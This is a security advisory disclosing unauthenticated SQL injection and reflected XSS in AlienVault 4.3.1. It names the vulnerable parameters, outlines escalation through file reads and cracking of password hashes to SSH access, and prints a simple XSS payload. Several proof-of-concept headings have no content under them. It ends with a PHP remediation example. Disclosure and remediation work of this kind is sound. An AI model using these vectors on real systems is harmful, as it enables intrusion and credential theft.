AlienVault 4.3.1 - Unauthenticated SQL Injection
AlienVault 4.3.1 Unauthenticated SQL Injection
Vulnerability Type: SQL Injection
Reporter: Sasha Zivojinovic
Company: Gotham Digital Science
Affected Software: AlienVault 4.3.1

Severity: Critical


A number of SQL injection vectors were identified within AlienVault (AV) 4.3.1 components. The Geolocation Graph and Radar Access Control AV components were found to accept HTTP request parameters that are concatenated into SQL queries without filtering or validation, exposing the application to SQL injection. This issue can be exploited by any unauthenticated user who has access to the AV web application. In addition, the effective MySQL user was found to be root, which allows attackers to leverage the identified issues into attacks against the AV host system.

Technical Details

The date_from and date_to parameters passed to the graph_geoloc.php page, the date_from and date_to parameters passed to the radar-iso27001-A11AccessControl-pot.php page, and the user parameter passed to the graph_geoloc2.php page are vulnerable to SQL injection. These parameters were found to evaluate any SQL statements passed to them via an HTTP GET request.

The PHP functions whereYM and getSourceLocalSSIYear in source file /var/www/geoloc/include/ do not filter or validate user-supplied input when constructing dynamic SQL queries. Attackers can inject arbitrary SQL statements that will be evaluated on the underlying MySQL server.

Due to time limitations it has not been possible to locate the causes of the other identified vectors.

Extending the attack:

An attacker can retrieve various AV credentials, including the MySQL connection string, by querying the alienvault.config database table or by reading the /etc/ossim/idm/config.xml file through MySQL file access functions such as LOAD_FILE. Almost all credentials used by AV are equivalent, so retrieving the credentials for the nessus user will also reveal the credentials for the SQL server and other components. These credentials are stored in plaintext within the database. By querying the alienvault.users table the attacker can retrieve the unsalted MD5 password hashes for administrative users. These hashed credentials are equivalent to the SSH credentials for the same users. Once these credentials have been retrieved and cracked, an attacker can bypass the restrictions present in the SQL injection vector and perform arbitrary system commands or SQL queries by connecting directly to the AV host via SSH and using the local MySQL client to connect to the MySQL server.

Cross Site Scripting (XSS):

In addition, the presence of MySQL errors presents an opportunity for reflected XSS attacks, as MySQL error responses are returned unfiltered to the application user.

Proof-of-Concept Exploit

The integer value passed as a parameter to the SLEEP function can be increased or decreased to validate this finding.

Error-based evaluation can be used to return the MySQL version, as per the following examples:

Duplicate entry 5.5.29-29.41 for key group_key

Pulling admin user password hashes:

Cross Site Scripting:

The following examples demonstrate the use of unfiltered MySQL errors as an XSS vector:

Vanilla XSS: <script>alert(GDS)</script>

ASCII Encoded XSS Variant (useful in bypassing application layer filters)


AlienVault deployments should be upgraded to the latest stable version. The issues documented in this disclosure have been remediated in AlienVault 4.3.2.
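For illustration, the concatenation pattern the advisory describes next to its corrected form. This is an added example, not AlienVault's code or the 4.3.2 fix; the helper names, the geoloc_events table and its columns are hypothetical.

```php
<?php
// Added example, not AlienVault's code: a hypothetical date-range helper in
// the style of the whereYM/getSourceLocalSSIYear pattern, vulnerable then fixed.
// VULNERABLE: request values are spliced into the SQL text, so a crafted
// date_from/date_to value becomes part of the query itself.
function whereYmVulnerable(string $dateFrom, string $dateTo): string
{
    return "WHERE ts BETWEEN '" . $dateFrom . "' AND '" . $dateTo . "'";
}

// Fix step 1: accept only a real YYYY-MM-DD calendar date, nothing else.
function parseIsoDate(string $value): DateTimeImmutable
{
    $dt = DateTimeImmutable::createFromFormat('!Y-m-d', $value);
    if ($dt === false || $dt->format('Y-m-d') !== $value) {
        throw new InvalidArgumentException('date must be YYYY-MM-DD');
    }
    return $dt;
}

// Fix step 2: the SQL text is constant; user input travels only as a bound
// value. $db is assumed to be a PDO handle opened with ERRMODE_EXCEPTION.
function fetchGeolocRows(PDO $db, string $dateFrom, string $dateTo): array
{
    $from = parseIsoDate($dateFrom)->format('Y-m-d');
    $to   = parseIsoDate($dateTo)->format('Y-m-d');
    $stmt = $db->prepare(
        'SELECT country, COUNT(*) AS hits FROM geoloc_events
          WHERE ts BETWEEN :from AND :to GROUP BY country'
    );
    $stmt->execute([':from' => $from, ':to' => $to]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Fix step 3: never echo driver error text to the browser (the advisory's
// reflected-XSS vector); log it server-side and return a fixed message.
function handleRequest(PDO $db, array $get): string
{
    try {
        $rows = fetchGeolocRows($db, $get['date_from'] ?? '', $get['date_to'] ?? '');
        return json_encode($rows, JSON_THROW_ON_ERROR);
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        return 'Invalid date range';
    } catch (PDOException $e) {
        error_log('geoloc query failed: ' . $e->getMessage());
        http_response_code(500);
        return 'Internal error';
    }
}
```

The date check rejects values such as 2013-02-30 that would otherwise roll over silently, and the bound parameters keep any remaining input out of the SQL text regardless of content.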